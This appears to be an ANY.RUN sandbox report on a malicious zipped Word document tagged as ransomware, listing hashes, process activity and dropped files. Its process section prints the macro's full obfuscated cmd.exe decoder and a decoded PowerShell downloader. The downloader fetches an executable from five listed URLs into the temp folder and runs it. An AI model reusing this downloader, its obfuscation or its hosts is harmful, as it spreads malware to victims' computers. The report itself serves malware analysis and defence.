analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0478911415250.doc.zip

Full analysis: https://app.any.run/tasks/974a390c-7d6e-4500-8af1-dad58373dcc5
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Malware Trends Tracker     >>>
Analysis date: January 22, 2019, 12:12:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

563A2A7FF65C3C9E1C0D955826BE785C

SHA1:

A06B214EE39790AFE7FCA19926F6ABE9ABC3527F

SHA256:

1E335105CF6E43A53F6218817F1D90949314950DE1BBBE582CD78A76467FD73A

SSDEEP:

3072:Djs5jcvOh1YJlXJyBJ7YFAeN6Us6HQhvyvXHbb1BP:DI5jcv2YJlXJyBJ7zeN2a6UHbbjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3940)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3940)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2112)
      • cmd.exe (PID: 2360)
      • cmd.exe (PID: 2472)
      • cmd.exe (PID: 3804)

    • Application launched itself

      • cmd.exe (PID: 2360)

  • INFO

    • Dropped object may contain Bitcoin addresses

      • WinRAR.exe (PID: 2844)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3940)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 0478911415250.doc
ZipUncompressedSize: 268986
ZipCompressedSize: 153884
ZipCRC: 0xa18561ca
ZipModifyDate: 2019:01:22 11:31:03
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 788
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2844"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\0478911415250.doc.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3940"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\0478911415250.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3804c:\h203\n1841\w6178\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2360CmD /V:/C"set Zz3p=\$Ua7so0VJjthXiBgfN:W_.~RMz3}/v5{r'l98Le1I=G-d2(PCu FA6by,+SD%nkc@mEO)pxT;HKq4w&&for %0 in (70,6,78,61,48,2,15,38,41,49,19,23,31,57,40,61,33,61,59,67,59,59,41,68,18,18,53,25,67,19,23,44,77,57,40,61,12,61,72,67,25,48,19,23,44,27,57,40,61,35,35,51,1,6,37,46,36,46,42,34,26,31,31,40,46,34,73,1,10,40,31,31,31,42,62,39,78,44,6,55,10,39,64,11,51,18,39,11,22,20,39,55,49,35,14,39,62,11,73,1,76,31,27,77,7,42,34,12,11,11,70,19,29,29,3,17,6,33,45,14,6,33,39,11,3,14,35,5,22,64,6,66,29,75,12,70,27,71,18,50,13,76,24,66,33,55,45,50,65,12,11,11,70,19,29,29,45,33,3,70,3,33,11,22,6,33,16,29,52,76,43,24,54,15,36,74,78,38,72,21,68,6,6,41,36,5,65,12,11,11,70,19,29,29,3,35,35,6,70,14,26,26,3,62,50,14,11,22,17,33,29,40,60,41,24,4,74,50,55,21,30,7,65,12,11,11,70,19,29,29,78,78,78,22,3,70,33,39,5,39,3,33,64,12,22,14,62,29,26,11,39,5,10,43,9,77,75,75,56,21,49,71,18,71,71,74,65,12,11,11,70,19,29,29,5,3,33,3,12,35,39,14,16,12,33,6,45,45,14,5,22,64,6,66,29,53,8,10,10,3,2,53,12,39,38,17,74,27,54,40,71,21,10,30,30,34,22,59,70,35,14,11,47,34,65,34,69,73,1,66,31,27,37,27,42,34,33,40,36,4,46,34,73,1,26,27,31,37,31,51,42,51,34,37,37,27,34,73,1,11,36,4,4,4,42,34,70,36,36,7,46,34,73,1,14,4,31,54,7,42,1,39,62,30,19,11,39,66,70,58,34,0,34,58,1,26,27,31,37,31,58,34,22,39,71,39,34,73,17,6,33,39,3,64,12,47,1,10,37,4,31,7,51,14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4048C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $o8292='z5512';$j1555=new-object Net.WebClient;$q5340='http://afordioretails.com/Khp3xNuXqRmrbdu@http://drapart.org/FqGR6B9HwLT_OooI9s@http://allopizzanuit.fr/1DIR7Hub_v0@http://www.apresearch.in/ztesjGJ4KKy_CxNxxH@http://sarahleighroddis.com/AVjjaUAheLfH361x_jvv'.Split('@');$m5383='r1972';$z3585 = '883';$t9777='p9902';$i7560=$env:temp+'\'+$z3585+'.exe';foreach($j8750 in $q5340){try{$j1555.DownloadFile($j8750, $i7560);$b714='u3975';If ((Get-Item $i7560).length -ge 40000) {Invoke-Item $i7560;$w1556='k6056';break;}}catch{}}$o770='q8506';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2112C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=AlED tokens=3" %Q IN ('assoc^|findstr llCm') DO %Q "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2472C:\Windows\system32\cmd.exe /c assoc|findstr llCmC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2748C:\Windows\system32\cmd.exe /S /D /c" assoc"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2852findstr llCmC:\Windows\system32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 339
Read events
928
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
3
Unknown types
5

Dropped files

PID
Process
Filename
Type
3940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDE60.tmp.cvr
MD5:
SHA256:
3940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A1B904A.jpg
MD5:
SHA256:
3940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:47D4ABDD6A3AF62D82904BDDED74943C
SHA256:8E826A430E60C52DB9DE71FC5A3DF36E28A6AA32F6BC062069E0FDE818509727
3940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:1CD265AE1717D986BEDAB0CA1E189D5A
SHA256:6FF35A5A210DD784FCCD6DA133EDDCDA36C6D0470DDBEF4CB804C55FAD62420E
3940WINWORD.EXEC:\Users\admin\Desktop\~$78911415250.docpgc
MD5:7DCB149DD7492ED51B34EBB4CCEDFB89
SHA256:14B3F6F0F67B53306EAB3389709B67C91D5273C4141551F83BD83B3D75E6FEBE
3940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0478911415250.doc.LNKlnk
MD5:47B4274640E10F7F78F36BE7A91B54DF
SHA256:40DDAE9ADFA155F698BFF72AC634AADCFCF18A2DBF4EC196E2CF7E6568F300E3
3940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5669342464A29A5B7EBA2F9AD623A18A
SHA256:2FBD3B2F4FC578414F1F6A037DDCA165F935296117E1902722C2EC9F1AE21277
2844WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2844.16280\0478911415250.docxml
MD5:0E1215AED06333D0329F17D9F9ACB259
SHA256:B97D4CF1B9BCBBC27F547EEAD8201A7120F5398F9BA4483ECB4A9F6CB990B300
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
0478911415250.doc.zip